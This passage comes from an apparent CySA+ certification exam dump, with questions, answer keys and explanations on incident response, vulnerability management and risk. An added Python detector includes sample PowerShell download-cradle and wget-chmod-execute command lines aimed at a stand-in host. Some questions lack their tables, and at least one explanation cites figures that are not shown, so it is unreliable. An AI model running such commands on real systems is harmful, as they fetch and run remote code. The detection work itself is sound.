visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent
lateral movement and potential data exfiltration. Which of the following techniques will best achieve the
improvement?

A. Mean time to detect
B. Mean time to respond
C. Mean time to remediate
D. Service-level agreement uptime

Correct Answer: A
Explanation

Explanation/Reference:
Improving the Mean Time to Detect (MTTD) is the most relevant technique to achieve the goal of reducing
the time to prevent lateral movement and potential data exfiltration by malicious actors.

MTTD measures the average time it takes for an organization to detect a security incident or malicious
activity once it has occurred. By reducing MTTD, you can identify security threats more quickly, which
allows for a faster response to contain the threat, prevent lateral movement, and potentially stop data
exfiltration before it occurs.

QUESTION 64
After identifying a threat, a company has decided to implement a patch management program to remediate
vulnerabilities. Which of the following risk management principles is the company exercising?

A. Transfer
B. Accept
C. Mitigate
D. Avoid

Correct Answer: C
Explanation

Explanation/Reference:
Mitigate is the best term to describe the risk management principle that the company is exercising, as it
means to reduce the likelihood or impact of a risk. By implementing a patch management program to
remediate vulnerabilities, the company is mitigating the threat of cyberattacks that could exploit those
vulnerabilities and compromise the security or functionality of the systems. The other terms are not as
accurate as mitigate, as they describe different risk management principles. Transfer means to shift the
responsibility or burden of a risk to another party, such as an insurer or a contractor. Accept means to
acknowledge the existence of a risk and decide not to take any action to reduce it, usually because the risk
is low or the cost of mitigation is too high. Avoid means to eliminate the possibility of a risk by changing the
plans or activities that could cause it, such as cancelling a project or discontinuing a service.

Reference: https://safetyculture.com/topics/risk-management/

QUESTION 65
A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The
analyst downloads a copy of the file from the email and isolates the affected workstation from the network.
Which of the following activities should the analyst perform next?

A. Wipe the computer and reinstall software
B. Shut down the email server and quarantine it from the network
C. Acquire a bit-level image of the affected workstation
D. Search for other mail users who have received the same file

Correct Answer: D
Explanation

Explanation/Reference:
The analyst is still in the containment phase, not eradication. The affected workstation is already isolated,
but the phishing email that delivered the file may have reached other mailboxes, so the next step is to
find every other user who received the same file and contain those systems before the ransomware
spreads further. Acquiring a bit-level image of the isolated workstation, eradication, and the rebuild of the
machine all come after containment is complete.

QUESTION 66
The security analyst received the monthly vulnerability report. The following findings were included in the
report:

1. Five of the systems only required a reboot to finalize the patch application
2. Two of the servers are running outdated operating systems and cannot be patched

The analyst determines that the only way to ensure these servers cannot be compromised is to isolate
them. Which of the following approaches will best minimize the risk of the outdated servers being
compromised?

A. Compensating controls
B. Due diligence
C. Maintenance windows
D. Passive discovery

Correct Answer: A
Explanation

Explanation/Reference:
Compensating controls are the best approach to minimize the risk of the outdated servers being
compromised. A compensating control is a security measure implemented to mitigate the risk of a
vulnerability or an attack when the primary control, here patching, is not feasible or effective. For servers
running operating systems that can no longer be patched, a compensating control could be to isolate
them on their own network segment, or to place a firewall or an intrusion prevention system in front of
them to monitor and block malicious traffic to or from the servers. Compensating controls reduce the
likelihood or impact of an exploit, but they do not eliminate the risk completely, so the security analyst
should also push for upgrading or replacing the outdated servers as soon as possible.

QUESTION 67
The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting
workstations that are used within the company:
Which of the following vulnerabilities should the analyst be most concerned about, knowing that end users
frequently click on malicious links sent via email?

A. Vulnerability A
B. Vulnerability B
C. Vulnerability C
D. Vulnerability D

Correct Answer: C
Explanation

Explanation/Reference:
In this scenario, Vulnerability C is the one that should most concern the analyst: according to the scan
data it has a network attack vector and high attack complexity, and it requires both privileges and user
interaction. In most environments the user-interaction requirement lowers the practical risk, but the
scenario states that end users frequently click malicious links sent via email, so that precondition is
routinely met and the vulnerability is realistically exploitable by a remote attacker, making it the most
critical threat in this context.

QUESTION 68
An incident response analyst is taking over an investigation from another analyst. The investigation has
been going on for the past few days. Which of the following steps is most important during the transition
between the two analysts?

A. Identify and discuss the lessons learned with the prior analyst.
B. Accept all findings and continue to investigate the next item target.
C. Review the steps that the previous analyst followed.
D. Validate the root cause from the prior analyst.

Correct Answer: C
Explanation

Explanation/Reference:
Reviewing the steps the previous analyst followed preserves continuity of the investigation: the incoming
analyst learns what evidence has been collected, what has already been ruled in or out, and where the
chain of custody stands, instead of accepting findings unverified or repeating work. Lessons learned
belong to the post-incident phase, and validating the root cause comes after the investigation is complete.

QUESTION 69
A company recently removed administrator rights from all of its end user workstations. An analyst uses
CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the
following information:
Which of the following vulnerabilities should be prioritized for remediation?

A. nessie.explosion
B. vote.4p
C. sweet.bike
D. great.skills

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 70
A recent penetration test discovered that several employees were enticed to assist attackers by visiting
specific websites and running downloaded files when prompted by phone calls. Which of the following
would best address this issue?

A. Increasing training and awareness for all staff
B. Ensuring that malicious websites cannot be visited
C. Blocking all scripts downloaded from the internet
D. Disabling all staff members’ ability to run downloaded applications

Correct Answer: A
Explanation

Explanation/Reference:
The employees were persuaded over the phone to visit sites and run files, which is a social-engineering
failure rather than a gap in a single technical control. Training and awareness addresses the human
behaviour being exploited; blocking sites, scripts or downloaded applications each closes only one of the
paths the attackers used and is routinely worked around.

QUESTION 71
A security analyst at a company is reviewing an alert from the file integrity monitoring indicating a
mismatch in the login. html file hash. After comparing the code with the previous version of the page
source code, the analyst found the following code snippet added:

Which of the following best describes the activity the analyst has observed?

A. Obfuscated links
B. Exfiltration
C. Unauthorized changes
D. Beaconing

Correct Answer: C
Explanation

Explanation/Reference:
A file integrity monitoring alert on login.html, together with a comparison against the last known-good
version showing code that was added, is direct evidence of an unauthorized change to the page. Whether
the injected code obfuscates links, beacons to an external host or exfiltrates credentials is what the
analyst determines next; the activity observed so far is the change itself.

QUESTION 72
A security administrator has been notified by the IT operations department that some vulnerability reports
contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?

A. Credentialed scan
B. External scan
C. Differential scan
D. Network scan

Correct Answer: A
Explanation

Explanation/Reference:
A credentialed scan is a type of vulnerability scan that uses valid credentials to log in to the scanned
systems and perform a more thorough and accurate assessment of their vulnerabilities. A credentialed
scan can access more information than a non-credentialed scan, such as registry keys, patch levels,
configuration settings, and installed applications. A credentialed scan can also reduce the number of false
positives and false negatives, as it can verify the actual state of the system rather than relying on inference
or assumptions. The other types of scans are not related to the issue of incomplete findings, as they refer
to different aspects of vulnerability scanning, such as the scope, location, or frequency of the scan. An
external scan is a scan that is performed from outside the network perimeter, usually from the internet. An
external scan can reveal how an attacker would see the network and what vulnerabilities are exposed to
the public. An external scan cannot access internal systems or resources that are behind firewalls or other
security controls. A differential scan is a scan that compares the results of two scans and highlights the
differences between them. A differential scan can help identify changes in the network environment, such
as new vulnerabilities, patched vulnerabilities, or new devices. A differential scan does not provide a
complete list of findings by itself, but rather a summary of changes. A network scan is a scan that
focuses on the network layer of the OSI model and detects vulnerabilities
related to network devices, protocols, services, and configurations. A network scan can discover open
ports, misconfigured firewalls, unencrypted traffic, and other network-related issues. A network scan does
not provide information about the application layer or the host layer of the OSI model, such as web
applications or operating systems.

Reference: https://www.splunk.com/en_us/blog/learn/vulnerability-scanning.html

QUESTION 73
An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed
logins occur within one minute. However, the control was unable to detect an attack with nine failed logins.
Which of the following best represents what occurred?

A. False positive
B. True negative
C. False negative
D. True positive

Correct Answer: C
Explanation

Explanation/Reference:
A false negative occurs when a security system or control fails to flag an actual threat or attack, which is
the case here: the rule fires only at ten failures within one minute, so an attacker who stops at nine (or
spreads the attempts over a longer window) is missed entirely. Static volume thresholds of this kind are
evaded by low-and-slow activity and should be complemented by pattern rules, such as a run of failures
followed by a success, or one source trying many different accounts.

QUESTION 74
A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go
and whether there are URIs that should be denied access prior to more in-depth scanning. Which of
following best fits the type of scanning activity requested?

A. Uncredentialed scan
B. Discovery scan
C. Vulnerability scan
D. Credentialed scan

Correct Answer: B
Explanation

Explanation/Reference:
A discovery scan is typically used to identify the scope of a web application and understand where the
scan will go. This type of scan is often the first step in assessing a web application's security and helps the
analyst determine which areas should be further examined or tested in-depth.

Reference: https://qualysguard.qg2.apps.qualys.com/portal-help/en/was/scans/scanning_basics.htm

QUESTION 75
Which of the following best describes the process of requiring remediation of a known threat within a given
time frame?

A. SLA
B. MOU
C. Best-effort patching
D. Organizational governance

Correct Answer: A
Explanation

Explanation/Reference:
An SLA is a formal agreement between two parties that defines the level of service, responsibilities, and
expectations. It often includes specific terms related to the time frame within which certain actions or
services must be performed. Requiring remediation of a known threat within a given time frame can be part
of an SLA related to cybersecurity or incident response, ensuring that security issues are addressed
promptly and effectively.

QUESTION 76
Which of the following risk management principles is accomplished by purchasing cyber insurance?

A. Accept
B. Avoid
C. Mitigate
D. Transfer

Correct Answer: D
Explanation

Explanation/Reference:
Transfer is the risk management principle that is accomplished by purchasing cyber insurance. Transfer is
a strategy that involves shifting the risk or its consequences to another party, such as an insurance
company, a vendor, or a partner. Transfer does not eliminate the risk, but it reduces the potential impact or
liability of the risk for the original party. Cyber insurance is a type of insurance that covers the losses and
damages resulting from cyberattacks, such as data breaches, ransomware, denial-of-service attacks, or
network disruptions. Cyber insurance can help transfer the risk of cyber incidents by providing financial
compensation, legal assistance, or recovery services to the insured party.

https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives
https://www.comptia.org/certifications/cybersecurity-analyst
https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-answered

QUESTION 77
A recent audit of the vulnerability management program outlined the finding for increased awareness of
secure coding practices. Which of the following would be best to address the finding?

A. Establish quarterly SDLC training on the top vulnerabilities for developers
B. Conduct a yearly inspection of the code repositories and provide the report to management.
C. Hire an external penetration test of the network
D. Deploy more vulnerability scanners for increased coverage

Correct Answer: A
Explanation

Explanation/Reference:
The finding in the audit suggests a need to improve awareness of secure coding practices. The most
appropriate action to address this finding is to provide training to the development team on secure coding
practices.

QUESTION 78
An organization has deployed a cloud-based storage system for shared data that is in phase two of the
data life cycle. Which of the following controls should the security team ensure are addressed? (Choose
two.)

A. Data classification
B. Data destruction
C. Data loss prevention
D. Encryption
E. Backups
F. Access controls

Correct Answer: CD
Explanation

Explanation/Reference:
This question is about managing data security and compliance in the cloud with regard to the data life
cycle; phase two is the storage phase in the common create, store, use, share, archive, destroy model.
DLP: Azure, GCP and AWS all provide tooling to identify confidential data at rest, in use and in transit and
to control how that data is used and shared in a shared storage environment.
Encryption protects the data at rest on the storage devices, in transit to and from the cloud, and
increasingly in use.
Both DLP and encryption are controls that apply to data while it is stored, which is the phase in question.

QUESTION 79
An analyst is conducting routine vulnerability assessments on the company infrastructure. When
performing these scans, a business-critical server crashes, and the cause is traced back to the
vulnerability scanner. Which of the following is the cause of this issue?

A. The scanner is running without an agent installed.
B. The scanner is running in active mode.
C. The scanner is segmented improperly
D. The scanner is configured with a scanning window

Correct Answer: B
Explanation

Explanation/Reference:
Active (network-based) scanning sends probes, including the vulnerability checks themselves, directly to
the target. On fragile or legacy services those probes can overload the host or trigger a crash condition in
the service being tested, which is why business-critical systems are often scanned passively, with agents,
or with the scanner's safe-check options enabled and within an agreed maintenance window.

QUESTION 80
An organization's threat intelligence team notes a recent trend in adversary privilege escalation
procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system
controls and execute commands with privileged credentials. Which of the following controls would be most
effective to reduce the rate of success of such attempts?

A. Set user account control protection to the most restrictive level on all devices
B. Implement MFA requirements for all internal resources
C. Harden systems by disabling or removing unnecessary services
D. Implement controls to block execution of untrusted applications

Correct Answer: C
Explanation

Explanation/Reference:
The procedures described abuse tools that are already present and trusted on the host (living off the
land), so controls that block untrusted applications (D) do not stop them, and MFA (B) does not help once
the adversary already holds privileged credentials on the system. Hardening the systems by disabling or
removing unnecessary services and native tooling reduces what the adversary has to work with and
removes the paths these procedures depend on.

QUESTION 81
A new zero-day vulnerability was released. A security analyst is prioritizing which systems should receive
deployment of compensating controls deployment first. The systems have been grouped into the
categories shown below:
Which of the following groups should be prioritized for compensating controls?

A. Group A
B. Group B
C. Group C
D. Group D

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 82
A Chief Information Security Officer wants to map all the attack vectors that the company faces each day.
Which of the following recommendations should the company align their security controls around?

A. OSSTMM
B. Diamond Model of Intrusion Analysis
C. OWASP
D. MITRE ATT&CK

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 83
Which of the following actions would an analyst most likely perform after an incident has been
investigated?

A. Risk assessment
B. Root cause analysis
C. Incident response plan
D. Tabletop exercise

Correct Answer: B
Explanation

Explanation/Reference:
After an incident has been investigated, one of the most important actions is to perform a root cause
analysis. Root cause analysis helps in identifying the underlying reasons or factors that led to the incident
in the first place. By understanding the root causes, organizations can implement corrective actions to
prevent similar incidents from occurring in the future. This analysis is crucial for improving the overall
security posture and resilience of the organization.
Reference: https://www.ibm.com/topics/incident-response

QUESTION 84
After completing a review of network activity, the threat hunting team discovers a device on the network
that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which
of the following is potentially occurring?

A. Irregular peer-to-peer communication
B. Rogue device on the network
C. Abnormal OS process behavior
D. Data exfiltration

Correct Answer: D
Explanation

Explanation/Reference:
Data exfiltration is the theft or unauthorized transfer or movement of data from a device or network. It can
occur as part of an automated attack or manually, on-site or through an internet connection, and can involve
various methods. It can affect personal or corporate data, such as sensitive or confidential information.
Data exfiltration can be prevented or detected by using compression, encryption, authentication,
authorization, and other controls.

The network activity shows that a device on the network is sending an outbound email via a mail client to a
non-company email address daily at 10:00 p.m. This could indicate that the device is compromised by
malware or an insider threat, and that the email is used to exfiltrate data from the network to an external
party.
The email could contain attachments, links, or hidden data that contain the stolen information. The timing
of the email could be designed to avoid detection by normal network monitoring or security systems.

QUESTION 85
A vulnerability scanner generates the following output:
The company has an SLA for patching that requires time frames to be met for high-risk vulnerabilities.
Which of the following should the analyst prioritize first for remediation?

A. Oracle JDK
B. Cisco Webex
C. Redis Server
D. SSL Self-signed Certificate

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 86
A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-
facing web server. Which of the following is the next step for the analyst to take?

A. Instruct the firewall engineer that a rule needs to be added to block this external server
B. Escalate the event to an incident and notify the SOC manager of the activity
C. Notify the incident response team that there is a DDoS attack occurring
D. Identify the IP/hostname for the requests and look at the related activity

Correct Answer: D
Explanation

Explanation/Reference:
Identifying the IP/hostname for the requests and looking at the related activity is the first step in
understanding the nature of the issue. This step is crucial for making informed decisions about how to
respond to the situation.

Once the analyst has gathered more information, they can then decide whether further escalation or
actions are necessary, such as alerting the incident response team or notifying higher management.

QUESTION 87
While reviewing web server logs, an analyst notices several entries with the same time stamps, but all
contain odd characters in the request line. Which of the following steps should be taken next?

A. Shut the network down immediately and call the next person in the chain of command.
B. Determine what attack the odd characters are indicative of.
C. Utilize the correct attack framework and determine what the incident response will consist of.
D. Notify the local law enforcement for incident response.

Correct Answer: B
Explanation

Explanation/Reference:
It's essential to investigate the anomalous entries to understand whether they indicate a potential attack or
malicious activity. This involves analyzing the nature of the odd characters, their patterns, and their
potential impact on the web server.

QUESTION 88
A security analyst receives an alert for suspicious activity on a company laptop. An excerpt of the log is
shown below:

Which of the following has most likely occurred?

A. An Office document with a malicious macro was opened.
B. A credential-stealing website was visited.
C. A phishing link in an email was clicked.
D. A web browser vulnerability was exploited.

Correct Answer: A
Explanation

Explanation/Reference:
An Office document with a malicious macro was opened is the most likely explanation for the suspicious
activity on the company laptop, as it reflects the common technique of using macros to
execute PowerShell commands that download and run malware. A macro is a piece of code that can
automate tasks or perform actions in an Office document, such as a Word file or an Excel spreadsheet.
Macros can be useful and legitimate, but they can also be abused by threat actors to deliver malware or
perform malicious actions on the system. A malicious macro can be embedded in an Office document that
is sent as an attachment in a phishing email or hosted on a compromised website. When the user opens
the document, they may be prompted to enable macros or content, which will trigger the execution of the
malicious code.
The malicious macro can then use PowerShell, which is a scripting language and command-line shell that
is built into Windows, to perform various tasks, such as downloading and running malware from a remote
URL, bypassing security controls, or establishing persistence on the system. The log excerpt shows that
PowerShell was used to download a string from a URL using the WebClient.DownloadString method,
which is a common way to fetch and execute malicious code from the internet. The log also shows that
PowerShell was used to invoke an expression (iex) that contains obfuscated code, which is another
common way to evade detection and analysis. The other options are not as likely as an Office document
with a malicious macro was opened, as they do not match the evidence in the log excerpt. A credential-
stealing website was visited is possible, but it does not explain why PowerShell was used to download and
execute code from a URL. A phishing link in an email was clicked is also possible, but it does not explain
what happened after the link was clicked or how PowerShell was involved. A web browser vulnerability
was exploited is unlikely, as it does not explain why PowerShell was used to download and execute code
from a URL.

QUESTION 89
During the log analysis phase, the following suspicious command is detected:

Which of the following is being attempted?

A. Buffer overflow
B. RCE
C. ICMP tunneling
D. Smurf attack

Correct Answer: B
Explanation

Explanation/Reference:
RCE stands for remote code execution, which is a type of attack that allows an attacker to execute
arbitrary commands on a target system. The suspicious command in the question is an example of RCE,
as it tries to download and execute a malicious file from a remote server using the wget and chmod
commands. A buffer overflow is a type of vulnerability that occurs when a program writes more data to a
memory buffer than it can hold, potentially overwriting other memory
locations and corrupting the program’s execution. ICMP tunneling is a technique that uses ICMP packets
to encapsulate and transmit data that would normally be blocked by firewalls or filters. A smurf attack is a
type of DDoS attack that floods a network with ICMP echo requests, causing all devices on the network to
reply and generate a large amount of traffic. Verified References: What Is Buffer Overflow? Attacks, Types
& Vulnerabilities - Fortinet, What Is a Smurf Attack? Smurf DDoS Attack | Fortinet, exploit - Interpreting
CVE ratings: Buffer Overflow vs. Denial of …
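The two command patterns discussed in QUESTION 88 (a PowerShell WebClient.DownloadString/iex cradle launched from an Office parent, possibly behind an encoded command) and QUESTION 89 (wget, chmod, then run) are what a detection rule should key on. The following is an added example, not code from the dump or from CompTIA; it assumes a constructed `host= user= parent= cmd=` telemetry format, and every host, user and URL in it is a sample value.

```python
"""Added example (not from the Pass2Lead dump or CompTIA): flag download-and-execute
command lines like the PowerShell DownloadString/iex cradle in QUESTION 88 and the
wget/chmod sequence in QUESTION 89. Log format, hosts and URLs are constructed."""
import base64
import re

# Constructed telemetry. Addresses come from the 203.0.113.0/24 documentation range and
# the encoded sample is built here so the reader can see exactly what it decodes to.
ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/b')".encode("utf-16le")
).decode()
SAMPLE_LOGS = [
    "host=WS01 user=jsmith parent=WINWORD.EXE cmd=powershell.exe -nop -w hidden -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')\"",
    "host=WS02 user=svc parent=explorer.exe cmd=powershell.exe -NoProfile -Command Get-Process",
    f"host=WS03 user=mlee parent=EXCEL.EXE cmd=powershell.exe -w hidden -enc {ENCODED_SAMPLE}",
    "host=srv01 user=www-data parent=bash cmd=wget http://203.0.113.5/x -O /tmp/x && chmod +x /tmp/x && /tmp/x",
    "host=srv02 user=admin parent=bash cmd=wget https://updates.example.invalid/p.tgz -O /var/tmp/p.tgz",
]

LOG_RE = re.compile(r"host=(?P<host>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$")
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
PS_DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
PS_EXEC = re.compile(r"\biex\b|Invoke-Expression", re.I)
PS_ENCODED = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
SH_DOWNLOAD = re.compile(r"\b(?:wget|curl)\b[^&;|]*https?://\S+")
SH_CHMOD = re.compile(r"chmod\s+(?:\+x|[0-7]*7[0-7]*)\s+(?P<path>\S+)")


def parse_line(line):
    """Split one telemetry record into its fields; None if the line is not in the expected format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_encoded_command(cmd):
    """Return the plaintext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE), else None."""
    m = PS_ENCODED.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_record(rec):
    """Return the technique labels that apply to one parsed record (empty list when nothing matches)."""
    findings = []
    cmd, parent = rec["cmd"], rec["parent"].lower()
    if re.search(r"\b(?:powershell|pwsh)(?:\.exe)?\b", cmd, re.I):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("powershell_encoded_command")
        # Evaluate the cradle indicators on the decoded text as well as on the raw command line.
        text = cmd + "\n" + (decoded or "")
        if PS_DOWNLOAD.search(text) and PS_EXEC.search(text):
            findings.append("powershell_download_cradle")
        if parent in OFFICE_PARENTS:
            findings.append("office_spawned_powershell")
    m = SH_CHMOD.search(cmd)
    if m and SH_DOWNLOAD.search(cmd):
        path = re.escape(m.group("path"))
        # Only flag when the file that was made executable is invoked later in the same command line.
        if re.search(r"(?:^|[\s;&|])(?:sh\s+|bash\s+|\./)?" + path + r"(?:\s|$)", cmd[m.end():]):
            findings.append("shell_download_chmod_execute")
    return findings


def scan_logs(lines):
    """Map host -> findings for every parseable line that produced at least one finding."""
    results = {}
    for line in lines:
        rec = parse_line(line)
        if rec:
            labels = analyze_record(rec)
            if labels:
                results[rec["host"]] = labels
    return results


if __name__ == "__main__":
    for host, labels in scan_logs(SAMPLE_LOGS).items():
        print(host, ", ".join(labels))
```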

QUESTION 90
Which of the following is described as a method of enforcing a security policy between cloud customers
and cloud services?

A. CASB
B. DMARC
C. SIEM
D. PAM

Correct Answer: A
Explanation

Explanation/Reference:
A CASB (Cloud Access Security Broker) is a security solution that acts as an intermediary between cloud
users and cloud providers, and monitors and enforces security policies for cloud access and usage. A
CASB can help organizations protect their data and applications in the cloud from unauthorized or
malicious access, as well as comply with regulatory standards and best practices. A CASB can also
provide visibility, control, and analytics for cloud activity, and identify and mitigate potential threats.
The other options are not correct. DMARC (Domain-based Message Authentication, Reporting and
Conformance) is an email authentication protocol that helps email domain owners prevent spoofing and
phishing attacks by verifying the sender’s identity and instructing the receiver how to handle
unauthenticated messages. SIEM (Security Information and Event Management) is a security solution that
collects, aggregates, and analyzes log data from various sources across an organization’s network, such
as applications, devices, servers, and users, and provides real-time alerts, dashboards, reports, and
incident response capabilities to help security teams identify and mitigate cyberattacks. PAM (Privileged
Access Management) is a security solution that helps organizations manage and protect the access and
permissions of users, accounts, processes, and systems that have elevated or administrative privileges.
PAM can help prevent credential theft, data breaches, insider threats, and compliance violations by
monitoring, detecting, and preventing unauthorized privileged access to critical resources.

QUESTION 91
During an incident, a security analyst discovers a large amount of PII has been emailed externally from an
employee to a public email address. The analyst finds that the external email is the employee's personal
email.

Which of the following should the analyst recommend be done first?

A. Place a legal hold on the employee's mailbox.
B. Enable filtering on the web proxy.
C. Disable the public email access with CASB.
D. Configure a deny rule on the firewall.

Correct Answer: A
Explanation

Explanation/Reference:
Placing a legal hold on the employee’s mailbox is the best action to perform first, as it preserves all
mailbox content, including deleted items and original versions of modified items, for potential legal or
forensic purposes. A legal hold is a feature that allows an administrator to retain mailbox data for a user
indefinitely or for a specified period, regardless of the user’s actions or retention policies. A legal hold can
be applied to a mailbox using Litigation Hold or In-Place Hold in Exchange Server or Exchange Online. A
legal hold can help to ensure that evidence of data exfiltration or other malicious activities is not lost or
tampered with, and that the organization can comply with any legal or regulatory obligations. The other
actions are not as urgent or effective as placing a legal hold on the employee’s mailbox, as they do not
address the immediate threat of data loss or compromise. Enabling filtering on the web proxy may help to
prevent some types of data exfiltration or malicious traffic, but it does not help to recover or preserve the
data that has already been emailed externally. Disabling the public email access with CASB (Cloud Access
Security Broker) may help to block or monitor the use of public email services by employees, but it does
not help to recover or preserve the data that has already been emailed externally. Configuring a deny rule
on the firewall may help to block or monitor the network traffic from the employee’s laptop, but it does not
help to recover or preserve the data that has already been emailed externally.

QUESTION 92
A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target
the company's business type may be able to breach the network and remain inside of it for an extended
period of time.

Which of the following techniques should be performed to meet the CISO's goals?

A. Vulnerability scanning
B. Adversary emulation
C. Passive discovery
D. Bug bounty

Correct Answer: B
Explanation

Explanation/Reference:
Adversary emulation is a technique that involves mimicking the tactics, techniques, and procedures (TTPs)
of a specific threat actor or group to test the effectiveness of the security controls and incident response
capabilities of an organization. Adversary emulation can help identify and address the gaps and
weaknesses in the security posture of an organization, as well as improve the readiness and skills of the
security team. Adversary emulation can also help measure the dwell time, which is the duration that a
threat actor remains undetected inside the network.
The other options are not the best techniques to meet the CISO’s goals. Vulnerability scanning (A) is a
technique that involves scanning the network and systems for known vulnerabilities, but it does not
simulate a real attack or test the incident response capabilities. Passive discovery (C) is a technique that
involves collecting information about the network and systems without sending any packets or probes, but
it does not identify or exploit any vulnerabilities or test the security controls.
Bug bounty (D) is a program that involves rewarding external researchers or hackers for finding and
reporting vulnerabilities in an organization’s systems or applications, but it does not focus on a specific
threat actor or group.

QUESTION 93
A security analyst performs a vulnerability scan. Based on the metrics from the scan results, the analyst
must prioritize which hosts to patch. The analyst runs the tool and receives the following output:

Which of the following hosts should be patched first, based on the metrics?

A. host01
B. host02
C. host03
D. host04

Correct Answer: C
Explanation

Explanation/Reference:
Host03 should be patched first, based on the metrics, as it has the highest risk score and the highest
number of critical vulnerabilities. The risk score is calculated by multiplying the CVSS score by the
exposure factor, which is the percentage of systems that are vulnerable to the exploit. Host03 has a risk
score of 10 x 0.9 = 9, which is higher than any other host. Host03 also has 5 critical vulnerabilities, which
are the most severe and urgent to fix, as they can allow remote code execution, privilege escalation, or
data loss. The other hosts have lower risk scores and lower numbers of critical vulnerabilities, so they can
be patched later.

QUESTION 94
Which of the following best describes the reporting metric that should be utilized when measuring the
degree to which a system, application, or user base is affected by an uptime availability outage?

A. Timeline
B. Evidence
C. Impact
D. Scope

Correct Answer: C
Explanation

Explanation/Reference:
The impact metric is the best way to measure the degree to which a system, application, or user base is
affected by an uptime availability outage. The impact metric quantifies the consequences of the outage in
terms of lost revenue, productivity, reputation, customer satisfaction, or other relevant factors. The impact
metric can help prioritize the recovery efforts and justify the resources needed to restore the service. The
other options are not the best ways to measure the degree to which a system, application, or user base is
affected by an uptime availability outage. The timeline metric (A) measures the duration and frequency of
the outage, but not its effects. The evidence metric (B) measures the sources and types of data that can be
used to investigate and analyze the outage, but not its effects. The scope metric (D) measures the extent
and severity of the outage, but not its effects.

QUESTION 95
A security analyst must preserve a system hard drive that was involved in a litigation request.

Which of the following is the best method to ensure the data on the device is not modified?

A. Generate a hash value and make a backup image.
B. Encrypt the device to ensure confidentiality of the data.
C. Protect the device with a complex password.
D. Perform a memory scan dump to collect residual data.

Correct Answer: A
Explanation

Explanation/Reference:
Generating a hash value and making a backup image is the best method to ensure the data on the device
is not modified, as it creates a verifiable copy of the original data that can be used for forensic analysis.
Encrypting the device, protecting it with a password, or performing a memory scan dump do not prevent
the data from being altered or deleted. Verified References: CompTIA CySA+ CS0-002 Certification Study
Guide, page 329

QUESTION 96
An attacker has just gained access to the syslog server on a LAN. Reviewing the syslog entries has
allowed the attacker to prioritize possible next targets.

Which of the following is this an example of?

A. Passive network foot printing
B. OS fingerprinting
C. Service port identification
D. Application versioning

Correct Answer: A
Explanation

Explanation/Reference:
Passive network foot printing is the best description of the example, as it reflects the technique of collecting
information about a network or system by monitoring or sniffing network traffic without sending any packets
or interacting with the target. Foot printing is a term that refers to the process of gathering information
about a target network or system, such as its IP addresses, open ports, operating systems, services, or
vulnerabilities. Foot printing can be done for legitimate purposes, such as penetration testing or auditing, or
for malicious purposes, such as reconnaissance or intelligence gathering. Foot printing can be classified
into two types: active and passive. Active foot printing involves sending packets or requests to the target
and analyzing the responses, such as using tools like ping, traceroute, or Nmap. Active foot printing can
provide more accurate and detailed information, but it can also be detected by firewalls or intrusion
detection systems (IDS).
Passive foot printing involves observing or capturing network traffic without sending any packets or
requests to the target, such as using tools like tcpdump, Wireshark, or Shodan. Passive foot printing can
provide less information, but it can also avoid detection by firewalls or IDS. The example in the question
shows that the attacker has gained access to the syslog server on a LAN and reviewed the syslog entries
to prioritize possible next targets. A syslog server is a server that collects and stores log messages from
various devices or applications on a network. A syslog entry is a record of an event or activity that occurred
on a device or application, such as an error, a warning, or an alert. By reviewing the syslog entries, the
attacker can obtain information about the network or system, such as its configuration, status,
performance, or security issues. This is an example of passive network foot printing, as the attacker is not
sending any packets or requests to the target, but rather observing or capturing network traffic from the
syslog server. The other options are not correct, as they describe different techniques or concepts. OS
fingerprinting is a technique of identifying the operating system of a target by analyzing its responses to
certain packets or requests, such as using tools like Nmap or Xprobe2. OS fingerprinting can be done
actively or passively, but it is not what the attacker is doing in the example. Service port identification is a
technique of identifying the services running on a target by scanning its open ports and analyzing its
responses to certain packets or requests, such as using tools like Nmap or Netcat. Service port
identification can be done actively or passively, but it is not what the attacker is doing in the example.
Application versioning is a concept that refers to the process of assigning unique identifiers to different
versions of an application, such as using numbers, letters, dates, or names.
Application versioning can help to track changes, updates, bugs, or features of an application, but it is not
related to what the attacker is doing in the example.

QUESTION 97
After a security assessment was done by a third-party consulting firm, the cybersecurity program
recommended integrating DLP and CASB to reduce analyst alert fatigue.

Which of the following is the best possible outcome that this effort hopes to achieve?

A. SIEM ingestion logs are reduced by 20%.
B. Phishing alerts drop by 20%.
C. False positive rates drop to 20%.
D. The MTTR decreases by 20%.

Correct Answer: D
Explanation

Explanation/Reference:
The MTTR (Mean Time to Resolution) decreases by 20% is the best possible outcome that this effort
hopes to achieve, as it reflects the improvement in the efficiency and effectiveness of the incident response
process by reducing analyst alert fatigue. Analyst alert fatigue is a term that refers to the phenomenon of
security analysts becoming overwhelmed, desensitized, or exhausted by the large number of alerts they
